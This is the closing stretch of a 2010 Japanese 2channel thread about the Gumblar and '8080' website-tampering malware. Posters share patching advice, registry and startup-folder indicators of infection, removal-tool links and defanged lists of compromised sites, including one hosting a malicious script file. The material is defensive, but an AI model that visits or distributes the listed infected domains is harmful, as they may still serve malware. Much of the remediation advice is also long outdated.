9.3以降の最新版にアップデートしてください
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますので、こちらもアップデートが必要です
感染すると所有するWebサイトのFTPのアカウントとパスワードを盗み
外部からサイトを改ざんされてウイルスを配布するようになります
特にレジストリなどからFTPソフトの設定を読み取るので
万一を考えてアカウントとパスワードは保存しないほうが賢明です
あとWebブラウザのInternet Explorer 6とOperaのアカウント情報も
盗むそうなのでバージョンアップやマスターパスワードを使って暗号化など
対策を考えてください
また偽セキュリティソフトなど他のウイルスを呼び込むため非常に危険です
感染したWebサイトの運営者の方はサイトを閉鎖して
ウイルスのない安全なPCからパスワードの変更をお願いします
■ 相次ぐサイト改ざん(1) 注意が必要なのは「ガンブラー」ではなく「8080」
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2115
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜アカウント情報盗み外部送信
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2143
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜サイト管理者の注意点は?
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2144
0931906
2010/02/06(土) 03:31:30ttp://anubis.iseclab.org/?action=result&task_id=1f6c515039f6cb6a45d78e22d06cf05ce&format=html
■ 8080系の感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動して
スタートアップ
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\
に"siszyd32.exe"や"wwwpos32.exe"など見知らぬ実行ファイルがあれば感染済
またはレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済です
0932906
2010/02/06(土) 03:33:42■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
0933906
2010/02/06(土) 03:36:19一部変更していないものもあるが、とりあえず以上で終了
0934名無しさん@お腹いっぱい。
2010/02/06(土) 03:37:41おつおつ〜
遠慮していたけどもっと間にレス入れたらよかったスマン
0935名無しさん@お腹いっぱい。
2010/02/06(土) 03:50:27Googleのキャッシュで見つけたが
メンテナンス中らしい
■JVN iPedia、MyJVN システムメンテナンスのお知らせ
下記の期間、システムメンテナンスのため、サービスがご利用頂けません。
ご不便をおかけいたしますが、ご理解いただきますようお願い申し上げます。
2010年02月05日(金) 18:30 〜 2010年02月08日(月) 12:00
0936名無しさん@お腹いっぱい。
2010/02/06(土) 04:00:50メンテナンスの件は入れなくても大丈夫な期間だね
もし期間中ならレスですむし
でじろくにつーほーしますた。
0938名無しさん@お腹いっぱい。
2010/02/06(土) 04:29:380939名無しさん@お腹いっぱい。
2010/02/06(土) 07:23:36> ■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種?)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。
>>852で復活が報告されている
0940名無しさん@お腹いっぱい。
2010/02/06(土) 07:50:36ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
0941名無しさん@お腹いっぱい。
2010/02/06(土) 08:02:19>>921 修正
こんなところでどうだ?
本格始動するようなら仮称でカテゴリ分けるということで
【Gumblar】混ぜるな危険【8080系】
■Gumblar(いわゆるGENOウイルス。たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種?)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。
だったが2010/2/5あたりからGumblar.xと同系らしき改ざんが
出現している模様で、これから注意が必要。名前は募集中。
■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。
8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)
【参考】
■ 「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
0942名無しさん@お腹いっぱい。
2010/02/06(土) 08:14:43やってる仕組みは大して変わらんから
同じスレでやってんだろ
ガン部ラーの亜種で間違ってんのカ
スクリプトの書き方が違う!!とか
0943名無しさん@お腹いっぱい。
2010/02/06(土) 08:17:09とかも
どんなソフトも一通り最新にしとくのが重要ってだけ
それはずっといっしょ
8080のの対策を施し、「これで大丈夫(キリッ」とか言ってると、…
0944名無しさん@お腹いっぱい。
2010/02/06(土) 08:22:19長すぎるしくだらない煽りついてるし
0945名無しさん@お腹いっぱい。
2010/02/06(土) 08:27:120946名無しさん@お腹いっぱい。
2010/02/06(土) 08:27:49Gumblar.xの項目の
>名前は募集中。
この部分は必要ない気がする。余計に混乱しそう
もしベンダーなりが名付けたらまたその時に考えれば良いんじゃないの?
正直、長々としたテンプレが必要なのかって気はするが…カテゴリー分けなんてSo-netなりそこらの記事のリンクだけで良いような気がする
細かくやりすぎると古くなってからの変更も大変
そもそもこのスレは改竄ウイルス総合スレであってGumblarのみを扱うスレじゃないし…そのためにGENOスレから派生した訳で
0947名無しさん@お腹いっぱい。
2010/02/06(土) 08:31:28>>922
>>926
だけでよい
混ぜるな危険あたりは全部要らない
0948名無しさん@お腹いっぱい。
2010/02/06(土) 08:40:27同じような脆弱性つかって同じような感染経路で
同じような被害をもたらす
なら同じようなものじゃないの
亜種?とどう違うの
定義分からないわ
0949名無しさん@お腹いっぱい。
2010/02/06(土) 08:51:43まあまずはここ読んでこい。長いからって途中で投げ出すなよw
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
Gumblar.xなり8080系なり明確に区別する必要はあると思う。特にこのスレでは
でもテンプレにそれを詳細に書くことはどうかなと個人的には思うな
Gumblar系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り
0950949
2010/02/06(土) 08:54:44×Gumblar系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り
↓
○Gumblar系、8080系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り
0951名無しさん@お腹いっぱい。
2010/02/06(土) 08:56:380952名無しさん@お腹いっぱい。
2010/02/06(土) 08:58:090953名無しさん@お腹いっぱい。
2010/02/06(土) 08:59:070954名無しさん@お腹いっぱい。
2010/02/06(土) 09:00:150955名無しさん@お腹いっぱい。
2010/02/06(土) 09:02:360956名無しさん@お腹いっぱい。
2010/02/06(土) 09:10:11>>947の言ってる3つにこれを加えるだけでいい
■ 「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
0957名無しさん@お腹いっぱい。
2010/02/06(土) 09:13:03何度やっても毎月に戻ってる。どうしたらいい?
0958名無しさん@お腹いっぱい。
2010/02/06(土) 09:13:27害虫そのものの研究者が話合わないか
まあここどういうスレにしたいかってことかね
0959名無しさん@お腹いっぱい。
2010/02/06(土) 09:17:37【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/
0960名無しさん@お腹いっぱい。
2010/02/06(土) 09:35:35セキュリティ関係ないからか
Secuniaがなんも言わんかったしインストールせんでもいいのかなー
0961名無しさん@お腹いっぱい。
2010/02/06(土) 10:01:54レジストリの書き込み権限がないからだろ
コンパネからではなく、javacpl.exeなりcplなりを管理者として実行
0962名無しさん@お腹いっぱい。
2010/02/06(土) 11:31:21バグ300個以上抱えたままでよければ。
0963名無しさん@お腹いっぱい。
2010/02/06(土) 12:57:08チェックパターンを強化しました
http://gumblar.s1.dynamitelife.net/gumx/
0964名無しさん@お腹いっぱい。
2010/02/06(土) 15:15:09p://jmsdf.sakura.ne.jp/p/
0965名無しさん@お腹いっぱい。
2010/02/06(土) 15:51:25/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
0966名無しさん@お腹いっぱい。
2010/02/06(土) 16:09:04tp://jmsdf●sakura●ne●jp/p/CSScriptLib●js
に仕込まれてるね
0967名無しさん@お腹いっぱい。
2010/02/06(土) 17:52:110968名無しさん@お腹いっぱい。
2010/02/06(土) 20:19:140969名無しさん@お腹いっぱい。
2010/02/06(土) 20:21:480970名無しさん@お腹いっぱい。
2010/02/06(土) 21:39:07bihada5●nes3●com
ggpurasu●com/PS2
gu-zu●com
kyoshin-jp●com
www●custom-mode●com
0971名無しさん@お腹いっぱい。
2010/02/06(土) 21:43:33torrentのスレなんかにめちゃくちゃ貼り付けてる方がいます。どうにかならないのですか?
0972名無しさん@お腹いっぱい。
2010/02/06(土) 21:44:500973名無しさん@お腹いっぱい。
2010/02/06(土) 21:46:360974名無しさん@お腹いっぱい。
2010/02/06(土) 21:49:430975名無しさん@お腹いっぱい。
2010/02/06(土) 22:01:290976名無しさん@お腹いっぱい。
2010/02/06(土) 22:25:288080系 スクリプト大幅に変更してないか?
何やってんだこれ。。。
http://pc11.2ch.net/test/read.cgi/sec/1265387369/
次スレおつ
0978名無しさん@お腹いっぱい。
2010/02/06(土) 22:27:340979名無しさん@お腹いっぱい。
2010/02/06(土) 22:45:210980名無しさん@お腹いっぱい。
2010/02/07(日) 00:13:360981名無しさん@お腹いっぱい。
2010/02/07(日) 00:29:41クレカ情報窃取の可能性って・・・
なにそれ怖い
0982名無しさん@お腹いっぱい。
2010/02/07(日) 00:32:470983名無しさん@お腹いっぱい。
2010/02/07(日) 00:37:14今のところクレジットカードは盗まれてないようだけど
0984名無しさん@お腹いっぱい。
2010/02/07(日) 00:48:45> ・WebGetter
> ttp://rd.or.tp/get.php
なんか繋がりにくいんだけどサイト落ちてるの?
>>964
めるぽしました。
0987名無しさん@お腹いっぱい。
2010/02/07(日) 12:45:49http://tsushima.2ch.net/test/read.cgi/newsplus/1265499507/
0988名無しさん@お腹いっぱい。
2010/02/07(日) 12:51:080989名無しさん@お腹いっぱい。
2010/02/07(日) 16:20:58テンプレ修正案出ているのを知らないようだから
【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/
0990名無しさん@お腹いっぱい。
2010/02/07(日) 16:48:500991名無しさん@お腹いっぱい。
2010/02/07(日) 16:50:290992名無しさん@お腹いっぱい。
2010/02/07(日) 16:56:050993名無しさん@お腹いっぱい。
2010/02/07(日) 17:12:59p://www.eonet.ne●jp/~inoue-clinic/
0994名無しさん@お腹いっぱい。
2010/02/07(日) 18:00:00>>568 >>747 で既出
0995名無しさん@お腹いっぱい。
2010/02/07(日) 18:10:29906のテンプレ修正案はそれほどアドバンテージは無いので
次スレはそのままそこでいいよ
0996名無しさん@お腹いっぱい。
2010/02/07(日) 18:18:55上:凸完了
下:留守に付き、明日以降凸予定
>>944
既出ではあっても二度目の報告がある事を憂慮すべきかと
0997名無しさん@お腹いっぱい。
2010/02/07(日) 18:19:34スクリプト変わった?
0998994
2010/02/07(日) 18:26:09再発かどうかは俺にはわからない
と一言入れておくべきだった
0999名無しさん@お腹いっぱい。
2010/02/07(日) 18:44:121000名無しさん@お腹いっぱい。
2010/02/07(日) 18:46:2310011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。